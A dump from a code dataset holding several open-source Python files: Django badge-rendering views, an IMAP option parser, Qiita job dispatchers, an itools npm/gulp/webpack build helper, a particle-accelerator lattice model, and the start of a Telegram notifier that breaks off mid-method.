| repo_name (string, 5–92 chars) | path (string, 4–221 chars) | copies (string, 19 values) | size (string, 4–6 chars) | content (string, 766–896k chars) | license (string, 15 values) | hash (int64) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
guegue/forocacao
|
forocacao/users/views.py
|
1
|
3882
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import base64
from PIL import Image, ImageDraw, ImageFont
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.views.generic import DetailView, ListView, RedirectView, UpdateView
from braces.views import LoginRequiredMixin
from easy_thumbnails.files import get_thumbnailer
from .models import User
class UserBadgeJPEG(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
def get(self, request, username):
participant = self.get_object()
event = participant.event
img = Image.new('RGBA', (event.badge_size_x, event.badge_size_y), event.badge_color)
draw = ImageDraw.Draw(img)
match = {
'event': event.name,
'name': "%s %s" % (participant.first_name.partition(' ')[0], participant.last_name.partition(' ')[0] ),
'first_name': participant.first_name,
'last_name': participant.last_name,
'profession': participant.profession,
'country': participant.country.name,
'type': participant.type,
'email': participant.email,
}
for field in event.eventbadge_set.all():
x = field.x
y = field.y
size = field.size
if field.field == 'logo':
if participant.event.logo:
logo = Image.open(participant.event.logo.file.file)
logo.thumbnail((size,size))
img.paste(logo, (x,y))
elif field.field == 'photo':
if participant.photo:
photo = Image.open(participant.photo)
photo.thumbnail((size,size))
img.paste(photo, (x,y))
else:
if field.field == 'text':
content = field.format
else:
content = match[field.field]
fnt = ImageFont.truetype(field.font.filename, size)
color = field.color
draw.text((x,y), ("%s") % (content), font=fnt, fill=color)
# stream the rendered badge back to the client as a PNG image
response = HttpResponse(content_type="image/png")
img.save(response, "PNG")
return response
class UserBadgeView(LoginRequiredMixin, DetailView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
template_name = 'users/user_badge.html'
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
class UserUpdateView(LoginRequiredMixin, UpdateView):
fields = ['first_name', 'last_name', 'phone', 'activities' ] #FIXME : add all needed fields
# we already imported User in the view code above, remember?
model = User
# send the user back to their own page after a successful update
def get_success_url(self):
return reverse("users:detail",
kwargs={"username": self.request.user.username})
def get_object(self):
# Only get the User record for the user making the request
return User.objects.get(username=self.request.user.username)
class UserListView(LoginRequiredMixin, ListView):
model = User
# These next two lines tell the view to index lookups by username
slug_field = "username"
slug_url_kwarg = "username"
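# --- Usage sketch (not part of the original file) ---
# These views are meant to be routed by username from the app's urls.py.
# The patterns below are an illustrative assumption (Django 1.x url() syntax,
# matching the django.core.urlresolvers import above), not project code:
#
#   from django.conf.urls import url
#   from . import views
#
#   urlpatterns = [
#       url(r'^(?P<username>[\w.@+-]+)/$', views.UserDetailView.as_view(), name='detail'),
#       url(r'^(?P<username>[\w.@+-]+)/badge/$', views.UserBadgeView.as_view(), name='badge'),
#       url(r'^(?P<username>[\w.@+-]+)/badge\.png$', views.UserBadgeJPEG.as_view(), name='badge_image'),
#   ]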
|
bsd-3-clause
| -8,969,089,653,582,079,000
| 34.290909
| 119
| 0.61154
| false
| 4.16971
| false
| false
| false
|
icgood/pymap
|
pymap/parsing/specials/options.py
|
1
|
5476
|
from __future__ import annotations
import re
from collections.abc import Iterable, Mapping
from typing import Optional
from . import AString, SequenceSet
from .. import Params, Parseable
from ..exceptions import NotParseable
from ..primitives import Number, List
from ...bytes import BytesFormat, rev
__all__ = ['ExtensionOption', 'ExtensionOptions']
class ExtensionOption(Parseable[bytes]):
"""Represents a single command option, which may or may not have an
associated value.
See Also:
`RFC 4466 2.1. <https://tools.ietf.org/html/rfc4466#section-2.1>`_
Args:
option: The name of the option.
arg: The option argument, if any.
"""
_opt_pattern = rev.compile(br'[a-zA-Z_.-][a-zA-Z0-9_.:-]*')
def __init__(self, option: bytes, arg: List) -> None:
super().__init__()
self.option = option
self.arg = arg
self._raw_arg: Optional[bytes] = None
@property
def value(self) -> bytes:
return self.option
def __bytes__(self) -> bytes:
if self.arg.value:
return BytesFormat(b'%b %b') % (self.option, self.raw_arg)
else:
return self.option
@property
def raw_arg(self) -> bytes:
if self._raw_arg is None:
if not self.arg:
self._raw_arg = b''
elif len(self.arg) == 1:
arg_0 = self.arg.value[0]
if isinstance(arg_0, (Number, SequenceSet)):
self._raw_arg = bytes(arg_0)
else:
self._raw_arg = bytes(self.arg)
else:
self._raw_arg = bytes(self.arg)
return self._raw_arg
@classmethod
def _parse_arg(cls, buf: memoryview, params: Params) \
-> tuple[List, memoryview]:
try:
num, buf = Number.parse(buf, params)
except NotParseable:
pass
else:
arg = List([num])
return arg, buf
try:
seq_set, buf = SequenceSet.parse(buf, params)
except NotParseable:
pass
else:
arg = List([seq_set])
return arg, buf
try:
params_copy = params.copy(list_expected=[AString, List])
return List.parse(buf, params_copy)
except NotParseable:
pass
return List([]), buf
@classmethod
def parse(cls, buf: memoryview, params: Params) \
-> tuple[ExtensionOption, memoryview]:
start = cls._whitespace_length(buf)
match = cls._opt_pattern.match(buf, start)
if not match:
raise NotParseable(buf[start:])
option = match.group(0).upper()
buf = buf[match.end(0):]
arg, buf = cls._parse_arg(buf, params)
return cls(option, arg), buf
class ExtensionOptions(Parseable[Mapping[bytes, List]]):
"""Represents a set of command options, which may or may not have an
associated argument. Command options are always optional, so the parsing
will not fail; it will just return an empty object.
See Also:
`RFC 4466 2.1. <https://tools.ietf.org/html/rfc4466#section-2.1>`_
Args:
options: The mapping of options to argument.
"""
_opt_pattern = re.compile(br'[a-zA-Z_.-][a-zA-Z0-9_.:-]*')
_empty: Optional[ExtensionOptions] = None
def __init__(self, options: Iterable[ExtensionOption]) -> None:
super().__init__()
self.options: Mapping[bytes, List] = \
{opt.option: opt.arg for opt in options}
self._raw: Optional[bytes] = None
@classmethod
def empty(cls) -> ExtensionOptions:
"""Return an empty set of command options."""
if cls._empty is None:
cls._empty = ExtensionOptions({})
return cls._empty
@property
def value(self) -> Mapping[bytes, List]:
return self.options
def has(self, option: bytes) -> bool:
return option in self.options
def get(self, option: bytes) -> Optional[List]:
return self.options.get(option, None)
def __bool__(self) -> bool:
return bool(self.options)
def __len__(self) -> int:
return len(self.options)
def __bytes__(self) -> bytes:
if self._raw is None:
parts = [ExtensionOption(option, arg)
for option, arg in sorted(self.options.items())]
self._raw = b'(' + BytesFormat(b' ').join(parts) + b')'
return self._raw
@classmethod
def _parse_paren(cls, buf: memoryview, paren: bytes) -> memoryview:
start = cls._whitespace_length(buf)
if buf[start:start + 1] != paren:
raise NotParseable(buf)
return buf[start + 1:]
@classmethod
def _parse(cls, buf: memoryview, params: Params) \
-> tuple[ExtensionOptions, memoryview]:
buf = cls._parse_paren(buf, b'(')
result: list[ExtensionOption] = []
while True:
try:
option, buf = ExtensionOption.parse(buf, params)
except NotParseable:
break
else:
result.append(option)
buf = cls._parse_paren(buf, b')')
return cls(result), buf
@classmethod
def parse(cls, buf: memoryview, params: Params) \
-> tuple[ExtensionOptions, memoryview]:
try:
return cls._parse(buf, params)
except NotParseable:
return cls.empty(), buf
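# --- Usage sketch (not part of the original module) ---
# ExtensionOptions.parse() consumes a parenthesized, space-separated option
# list and never raises: on unparseable input it returns the shared empty
# instance. The bare Params() call below is an assumption; the real class
# may need arguments describing the surrounding parser state.
def _usage_example() -> None:
    buf = memoryview(b'(SHRINK)')
    options, remaining = ExtensionOptions.parse(buf, Params())
    assert options.has(b'SHRINK')
    assert len(remaining) == 0  # the whole buffer was consumed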
|
mit
| 3,286,872,938,212,346,000
| 29.422222
| 76
| 0.56355
| false
| 3.976761
| false
| false
| false
|
squirrelo/qiita
|
qiita_ware/dispatchable.py
|
1
|
8731
|
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from .analysis_pipeline import RunAnalysis
from qiita_ware.commands import submit_EBI, submit_VAMPS
from qiita_db.analysis import Analysis
def submit_to_ebi(preprocessed_data_id, submission_type):
"""Submit a study to EBI"""
submit_EBI(preprocessed_data_id, submission_type, True)
def submit_to_VAMPS(preprocessed_data_id):
"""Submit a study to VAMPS"""
return submit_VAMPS(preprocessed_data_id)
def run_analysis(analysis_id, commands, comm_opts=None,
rarefaction_depth=None, merge_duplicated_sample_ids=False,
**kwargs):
"""Run an analysis"""
analysis = Analysis(analysis_id)
ar = RunAnalysis(**kwargs)
return ar(analysis, commands, comm_opts, rarefaction_depth,
merge_duplicated_sample_ids)
def create_raw_data(artifact_type, prep_template, filepaths, name=None):
"""Creates a new raw data
Needs to be dispatchable because it moves large files
Parameters
----------
artifact_type: str
The artifact type
prep_template : qiita_db.metadata_template.prep_template.PrepTemplate
The template to attach the artifact
filepaths : list of (str, str)
The list with filepaths and their filepath types
name : str, optional
The name of the new artifact
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.artifact import Artifact
status = 'success'
msg = ''
try:
Artifact.create(filepaths, artifact_type, name=name,
prep_template=prep_template)
except Exception as e:
# We should hit this exception rarely (that's why it is an
# exception) since at this point we have done multiple checks.
# However, it can occur in weird cases, so better let the GUI know
# that this failed
return {'status': 'danger',
'message': "Error creating artifact: %s" % str(e)}
return {'status': status, 'message': msg}
def copy_raw_data(prep_template, artifact_id):
"""Creates a new raw data by copying from artifact_id
Parameters
----------
prep_template : qiita_db.metadata_template.prep_template.PrepTemplate
The template to attach the artifact
artifact_id : int
The id of the artifact to duplicate
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.artifact import Artifact
status = 'success'
msg = ''
try:
Artifact.copy(Artifact(artifact_id), prep_template)
except Exception as e:
# We should hit this exception rarely (that's why it is an
# exception) since at this point we have done multiple checks.
# However, it can occur in weird cases, so better let the GUI know
# that this failed
return {'status': 'danger',
'message': "Error creating artifact: %s" % str(e)}
return {'status': status, 'message': msg}
def delete_artifact(artifact_id):
"""Deletes an artifact from the system
Parameters
----------
artifact_id : int
The artifact to delete
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.artifact import Artifact
status = 'success'
msg = ''
try:
Artifact.delete(artifact_id)
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def create_sample_template(fp, study, is_mapping_file, data_type=None):
"""Creates a sample template
Parameters
----------
fp : str
The file path to the template file
study : qiita_db.study.Study
The study to add the sample template to
is_mapping_file : bool
Whether `fp` contains a mapping file or a sample template
data_type : str, optional
If `is_mapping_file` is True, the data type of the prep template to be
created
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
# The imports need to be in here because this code is executed in
# the ipython workers
import warnings
from os import remove
from qiita_db.metadata_template.sample_template import SampleTemplate
from qiita_db.metadata_template.util import load_template_to_dataframe
from qiita_ware.metadata_pipeline import (
create_templates_from_qiime_mapping_file)
status = 'success'
msg = ''
try:
with warnings.catch_warnings(record=True) as warns:
if is_mapping_file:
create_templates_from_qiime_mapping_file(fp, study,
data_type)
else:
SampleTemplate.create(load_template_to_dataframe(fp),
study)
remove(fp)
# join all the warning messages into one. Note that this
# info will be ignored if an exception is raised
if warns:
msg = '\n'.join(set(str(w.message) for w in warns))
status = 'warning'
except Exception as e:
# Some error occurred while processing the sample template
# Show the error to the user so they can fix the template
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def update_sample_template(study_id, fp):
"""Updates a sample template
Parameters
----------
study_id : int
Study id whose template is going to be updated
fp : str
The file path to the template file
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
import warnings
from os import remove
from qiita_db.metadata_template.util import load_template_to_dataframe
from qiita_db.metadata_template.sample_template import SampleTemplate
msg = ''
status = 'success'
try:
with warnings.catch_warnings(record=True) as warns:
# deleting previous uploads and inserting new one
st = SampleTemplate(study_id)
df = load_template_to_dataframe(fp)
st.extend(df)
st.update(df)
remove(fp)
# join all the warning messages into one. Note that this info
# will be ignored if an exception is raised
if warns:
msg = '\n'.join(set(str(w.message) for w in warns))
status = 'warning'
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def delete_sample_template(study_id):
"""Delete a sample template
Parameters
----------
study_id : int
Study id whose template is going to be deleted
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
from qiita_db.metadata_template.sample_template import SampleTemplate
msg = ''
status = 'success'
try:
SampleTemplate.delete(study_id)
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
def update_prep_template(prep_id, fp):
"""Updates a prep template
Parameters
----------
prep_id : int
Prep template id to be updated
fp : str
The file path to the template file
Returns
-------
dict of {str: str}
A dict of the form {'status': str, 'message': str}
"""
import warnings
from os import remove
from qiita_db.metadata_template.util import load_template_to_dataframe
from qiita_db.metadata_template.prep_template import PrepTemplate
msg = ''
status = 'success'
prep = PrepTemplate(prep_id)
try:
with warnings.catch_warnings(record=True) as warns:
df = load_template_to_dataframe(fp)
prep.extend(df)
prep.update(df)
remove(fp)
if warns:
msg = '\n'.join(set(str(w.message) for w in warns))
status = 'warning'
except Exception as e:
status = 'danger'
msg = str(e)
return {'status': status, 'message': msg}
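# --- Usage sketch (not part of the original module) ---
# Every dispatchable above returns a {'status': str, 'message': str} dict so
# the calling layer can report success ('success'), warnings ('warning') and
# failures ('danger') uniformly. The call at the end is illustrative only.
def _handle_result(result):
    """Print the outcome of a dispatchable call in a uniform way."""
    if result['status'] == 'success':
        print('done')
    elif result['status'] == 'warning':
        print('done with warnings: %s' % result['message'])
    else:
        print('failed: %s' % result['message'])
# Example: _handle_result(delete_sample_template(1))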
|
bsd-3-clause
| 4,269,830,663,802,809,300
| 28.59661
| 79
| 0.590654
| false
| 4.171524
| false
| false
| false
|
bepatient-fr/itools
|
itools/pkg/build_gulp.py
|
1
|
4272
|
# -*- coding: UTF-8 -*-
# Copyright (C) 2016 Sylvain Taverne <taverne.sylvain@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# Import from standard library
import sys
from subprocess import Popen
# Import from itools
from itools.fs.lfs import LocalFolder
from itools.uri import get_uri_name, Path
class GulpBuilder(object):
"""
Run "gulp build" in project's repository & add generated files
$ ui/{SKINS}/*
into the project MANIFEST file.
That allow to avoid commit compiled JS/CSS files into GIT.
"""
def __init__(self, package_root, worktree, manifest):
self.package_root = package_root
if self.package_root != '.':
self.ui_path = '{0}/ui/'.format(self.package_root)
else:
self.ui_path = 'ui/'
self.worktree = worktree
self.manifest = manifest
self.fs = LocalFolder('.')
if self.fs.is_folder(self.ui_path):
self.dist_folders = tuple(['{0}{1}'.format(self.ui_path, x)
for x in LocalFolder(self.ui_path).get_names()])
def run(self):
npm_done = self.launch_npm_install()
gulp_done = self.launch_gulp_build()
webpack_done = self.launch_webpack()
# Add DIST files into manifest
if (npm_done or gulp_done or webpack_done) and self.fs.exists(self.ui_path):
for path in self.fs.traverse(self.ui_path):
relative_path = self.fs.get_relative_path(path)
if (relative_path and
relative_path.startswith(self.dist_folders) and self.fs.is_file(path)):
self.manifest.add(relative_path)
def launch_npm_install(self):
done = False
for path in self.manifest:
filename = get_uri_name(path)
if filename == 'package.json':
print '***'*25
print '*** Run $ npm install on ', path
print '***'*25
path = str(Path(path)[:-1]) + '/'
p = Popen(['npm', 'install'], cwd=path)
p.wait()
if p.returncode == 1:
print '***'*25
print '*** Error running npm install ', path
print '***'*25
sys.exit(1)
done = True
return done
def launch_gulp_build(self):
done = False
for path in self.manifest:
filename = get_uri_name(path)
if filename == 'gulpfile.js':
print '***'*25
print '*** Run $ gulp build on ', path
print '***'*25
path = str(Path(path)[:-1]) + '/'
p = Popen(['gulp', 'build'], cwd=path)
p.wait()
if p.returncode == 1:
print '***'*25
print '*** Error running gulp ', path
print '***'*25
sys.exit(1)
done = True
return done
def launch_webpack(self):
done = False
for path in self.manifest:
filename = get_uri_name(path)
if filename == 'webpack.config.js':
print '***'*25
print '*** Run $ webpack ', path
print '***'*25
path = str(Path(path)[:-1]) + '/'
p = Popen(['webpack', '--mode=production'], cwd=path)
p.wait()
if p.returncode == 1:
print '***'*25
print '*** Error running webpack ', path
print '***'*25
sys.exit(1)
done = True
return done
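# --- Usage sketch (not part of the original module) ---
# GulpBuilder is driven by the packaging code with the package root, a git
# worktree object and the MANIFEST set; the values below are illustrative
# assumptions only.
#
#   manifest = set(['package.json', 'gulpfile.js', 'ui/skin/app.js'])
#   builder = GulpBuilder('.', worktree=None, manifest=manifest)
#   builder.run()   # runs npm install / gulp build / webpack where found,
#                   # then adds the generated ui/* files to the manifest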
|
gpl-3.0
| 1,900,275,981,483,111,000
| 34.6
| 91
| 0.526919
| false
| 4.111646
| false
| false
| false
|
lnls-fac/sirius
|
pymodels/TS_V03_03/lattice.py
|
1
|
10721
|
"""Lattice module.
In this module the lattice of the corresponding accelerator is defined.
"""
import math as _math
import numpy as _np
from pyaccel import lattice as _pyacc_lat, elements as _pyacc_ele, \
accelerator as _pyacc_acc, optics as _pyacc_opt
energy = 0.15e9 # [eV]
default_optics_mode = 'M1'
class LatticeError(Exception):
"""LatticeError class."""
def create_lattice(optics_mode=default_optics_mode):
"""Create lattice function."""
strengths, twiss_at_start = get_optics_mode(optics_mode)
# -- shortcut symbols --
marker = _pyacc_ele.marker
drift = _pyacc_ele.drift
quadrupole = _pyacc_ele.quadrupole
rbend_sirius = _pyacc_ele.rbend
hcorrector = _pyacc_ele.hcorrector
vcorrector = _pyacc_ele.vcorrector
# --- drift spaces ---
ldif = 0.1442
l015 = drift('l015', 0.1500)
l020 = drift('l020', 0.2000)
l025 = drift('l025', 0.2500)
l040 = drift('l040', 0.4000)
l060 = drift('l060', 0.6000)
l080 = drift('l080', 0.8000)
l090 = drift('l090', 0.9000)
l130 = drift('l130', 1.3000)
l220 = drift('l220', 2.2000)
l280 = drift('l280', 2.8000)
la2p = drift('la2p', 0.08323)
lb2p = drift('lb2p', 0.1330)
ld2p = drift('ld2p', 0.1920)
ld3p = drift('ld3p', 0.1430)
la3p = drift('la3p', 0.2320 - ldif)
lb1p = drift('lb1p', 0.2200 - ldif)
lb3p = drift('lb3p', 0.19897 - ldif)
lc1p = drift('lc1p', 0.18704 - ldif)
lc2p = drift('lc2p', 0.2260 - ldif)
ld1p = drift('ld1p', 0.21409 - ldif)
# --- markers ---
inicio = marker('start')
fim = marker('end')
# --- beam screens ---
scrn = marker('Scrn')
# --- beam current monitors ---
ict = marker('ICT')
fct = marker('FCT')
# --- beam position monitors ---
bpm = marker('BPM')
# --- correctors ---
ch = hcorrector('CH', 0.0)
cv = vcorrector('CV', 0.0)
# --- quadrupoles ---
qf1a = quadrupole('QF1A', 0.14, strengths['qf1a'])
qf1b = quadrupole('QF1B', 0.14, strengths['qf1b'])
qd2 = quadrupole('QD2', 0.14, strengths['qd2'])
qf2 = quadrupole('QF2', 0.20, strengths['qf2'])
qf3 = quadrupole('QF3', 0.20, strengths['qf3'])
qd4a = quadrupole('QD4A', 0.14, strengths['qd4a'])
qf4 = quadrupole('QF4', 0.20, strengths['qf4'])
qd4b = quadrupole('QD4B', 0.14, strengths['qd4b'])
# --- bending magnets ---
d2r = (_math.pi/180)
# -- b --
f = 5.011542/5.333333
h1 = rbend_sirius(
'B', 0.196, d2r*0.8597*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.163, -1.443, 0])*f)
h2 = rbend_sirius(
'B', 0.192, d2r*0.8467*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.154, -1.418, 0])*f)
h3 = rbend_sirius(
'B', 0.182, d2r*0.8099*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.140, -1.403, 0])*f)
h4 = rbend_sirius(
'B', 0.010, d2r*0.0379*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.175, -1.245, 0])*f)
h5 = rbend_sirius(
'B', 0.010, d2r*0.0274*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.115, -0.902, 0])*f)
h6 = rbend_sirius(
'B', 0.013, d2r*0.0244*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.042, -1.194, 0])*f)
h7 = rbend_sirius(
'B', 0.017, d2r*0.0216*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, -0.008, -1.408, 0])*f)
h8 = rbend_sirius(
'B', 0.020, d2r*0.0166*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, 0.004, -1.276, 0])*f)
h9 = rbend_sirius(
'B', 0.030, d2r*0.0136*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, 0.006, -0.858, 0])*f)
h10 = rbend_sirius(
'B', 0.05, d2r*0.0089*f, 0, 0, 0, 0, 0, [0, 0, 0],
_np.array([0, 0.000, -0.050, 0])*f)
mbend = marker('mB')
bend = [h10, h9, h8, h7, h6, h5, h4, h3, h2, h1, mbend,
h1, h2, h3, h4, h5, h6, h7, h8, h9, h10]
# -- Thin Septum --
dip_nam = 'EjeSeptF'
dip_len = 0.5773
dip_ang = -3.6 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang/2, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
bejesf = marker('bEjeSeptF') # marker at the beginning of thin septum
mejesf = marker('mEjeSeptF') # marker at the center of thin septum
eejesf = marker('eEjeSeptF') # marker at the end of thin septum
ejesf = [bejesf, h1, mejesf, h2, eejesf]
# -- bo thick ejection septum --
dip_nam = 'EjeSeptG'
dip_len = 0.5773
dip_ang = -3.6 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
bejesg = marker('bEjeSeptG') # marker at the beginning of thick septum
mejesg = marker('mEjeSeptG') # marker at the center of thick septum
eejesg = marker('eEjeSeptG') # marker at the end of thick septum
ejesg = [bejesg, h1, mejesg, h2, eejesg]
# -- si thick injection septum (2 of these are used) --
dip_nam = 'InjSeptG'
dip_len = 0.5773
dip_ang = +3.6 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
binjsg = marker('bInjSeptG') # marker at the beginning of thick septum
minjsg = marker('mInjSeptG') # marker at the center of thick septum
einjsg = marker('eInjSeptG') # marker at the end of thick septum
injsg = [binjsg, h1, minjsg, h2, einjsg]
# -- si thin injection septum --
dip_nam = 'InjSeptF'
dip_len = 0.5773
dip_ang = +3.118 * d2r
dip_K = 0.0
dip_S = 0.00
h1 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 1*dip_ang/2, 0*dip_ang, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
h2 = rbend_sirius(
dip_nam, dip_len/2, dip_ang/2, 0*dip_ang, 1*dip_ang/2, 0, 0, 0,
[0, 0, 0], [0, dip_K, dip_S])
binjsf = marker('bInjSeptF') # marker at the beginning of thin septum
minjsf = marker('mInjSeptF') # marker at the center of thin septum
einjsf = marker('eInjSeptF') # marker at the end of thin septum
injsf = [binjsf, h1, minjsf, h2, einjsf]
# --- lines ---
sec01 = [
ejesf, l025, ejesg, l060, cv, l090, qf1a, la2p, ict, l280, scrn, bpm,
l020, ch, l020, qf1b, l020, cv, l020, la3p, bend]
sec02 = [
l080, lb1p, qd2, lb2p, l080, scrn, bpm, l020, qf2, l020, ch, l025, cv,
l015, lb3p, bend]
sec03 = [lc1p, l220, qf3, l025, scrn, bpm, l020, ch, l025, cv, lc2p, bend]
sec04 = [
ld1p, l130, qd4a, ld2p, l060, scrn, bpm, l020, cv, l025, ch, l020,
qf4, ld3p, l020, qd4b, l060, fct, l040, ict, l040, scrn, bpm, cv,
l020, injsg, l025, injsg, l025, injsf, scrn]
elist = [inicio, sec01, sec02, sec03, sec04, fim]
the_line = _pyacc_lat.build(elist)
# shifts model to marker 'start'
idx = _pyacc_lat.find_indices(the_line, 'fam_name', 'start')
the_line = _pyacc_lat.shift(the_line, idx[0])
lengths = _pyacc_lat.get_attribute(the_line, 'length')
for length in lengths:
if length < 0:
raise LatticeError('Model with negative drift!')
# sets number of integration steps
set_num_integ_steps(the_line)
# -- define vacuum chamber for all elements
the_line = set_vacuum_chamber(the_line)
return the_line, twiss_at_start
def get_optics_mode(optics_mode):
"""Return magnet strengths of a given opics mode."""
twiss_at_start = _pyacc_opt.Twiss.make_new(
beta=[9.321, 12.881], alpha=[-2.647, 2.000], etax=[0.231, 0.069])
# -- selection of optics mode --
if optics_mode == 'M1':
strengths = {
'qf1a': 1.70521151606,
'qf1b': 1.734817173998,
'qd2': -2.8243902951,
'qf2': 2.76086143922,
'qf3': 2.632182549934,
'qd4a': -3.048732667316,
'qf4': 3.613066375692,
'qd4b': -1.46213606815,
}
elif optics_mode == 'M2':
strengths = {
'qf1a': 1.670801801437,
'qf1b': 2.098494339697,
'qd2': -2.906779151209,
'qf2': 2.807031512313,
'qf3': 2.533815202102,
'qd4a': -2.962460334623,
'qf4': 3.537403658428,
'qd4b': -1.421177262593,
}
else:
raise _pyacc_acc.AcceleratorException(
'Invalid TS optics mode: ' + optics_mode)
return strengths, twiss_at_start
def set_num_integ_steps(the_line):
"""Set number of integration steps in each lattice element."""
for i, _ in enumerate(the_line):
if the_line[i].angle:
length = the_line[i].length
the_line[i].nr_steps = max(10, int(_math.ceil(length/0.035)))
elif the_line[i].polynom_b[1]:
the_line[i].nr_steps = 10
elif the_line[i].polynom_b[2]:
the_line[i].nr_steps = 5
else:
the_line[i].nr_steps = 1
def set_vacuum_chamber(the_line):
"""Set vacuum chamber for all elements."""
# -- default physical apertures --
for i, _ in enumerate(the_line):
the_line[i].hmin = -0.012
the_line[i].hmax = +0.012
the_line[i].vmin = -0.012
the_line[i].vmax = +0.012
# -- bo ejection septa --
beg = _pyacc_lat.find_indices(the_line, 'fam_name', 'bEjeSeptF')[0]
end = _pyacc_lat.find_indices(the_line, 'fam_name', 'eEjeSeptG')[0]
for i in range(beg, end+1):
the_line[i].hmin = -0.0150
the_line[i].hmax = +0.0150
the_line[i].vmin = -0.0040
the_line[i].vmax = +0.0040
# -- si thick injection septum --
beg = _pyacc_lat.find_indices(the_line, 'fam_name', 'bInjSeptG')[0]
end = _pyacc_lat.find_indices(the_line, 'fam_name', 'eInjSeptG')[0]
for i in range(beg, end+1):
the_line[i].hmin = -0.0045
the_line[i].hmax = +0.0045
the_line[i].vmin = -0.0035
the_line[i].vmax = +0.0035
# -- si thin injection septum --
beg = _pyacc_lat.find_indices(the_line, 'fam_name', 'bInjSeptF')[0]
end = _pyacc_lat.find_indices(the_line, 'fam_name', 'eInjSeptF')[0]
for i in range(beg, end+1):
the_line[i].hmin = -0.0150
the_line[i].hmax = +0.0150
the_line[i].vmin = -0.0035
the_line[i].vmax = +0.0035
return the_line
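# --- Usage sketch (not part of the original module) ---
# A minimal sanity check of the lattice factory: build the default optics
# mode and confirm the line was shifted to the 'start' marker (create_lattice
# already raises LatticeError on negative drifts).
def _usage_example():
    the_line, twiss_at_start = create_lattice(optics_mode=default_optics_mode)
    assert the_line[0].fam_name == 'start'
    print(len(the_line), 'elements in the TS line')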
|
mit
| -4,336,585,749,294,970,400
| 33.583871
| 78
| 0.544819
| false
| 2.336239
| false
| false
| false
|
toshka/torrt
|
torrt/notifiers/telegram.py
|
1
|
1820
|
import logging
import requests
from requests import RequestException
from torrt.base_notifier import BaseNotifier
from torrt.utils import NotifierClassesRegistry
LOGGER = logging.getLogger(__name__)
class TelegramNotifier(BaseNotifier):
"""Telegram bot notifier. See instructions how to create bot at https://core.telegram.org/bots/api"""
alias = 'telegram'
url = 'https://api.telegram.org/bot'
def __init__(self, token, chat_id):
"""
:param token: str - Telegram's bot token
:param chat_id: str - Telegram's chat ID
"""
self.token = token
self.chat_id = chat_id
def make_message(self, torrent_data):
return '''The following torrents were updated:\n%s''' \
% '\n'.join(map(lambda t: t['name'], torrent_data.values()))
def test_configuration(self):
url = '%s%s/getMe' % (self.url, self.token)
r = requests.get(url)
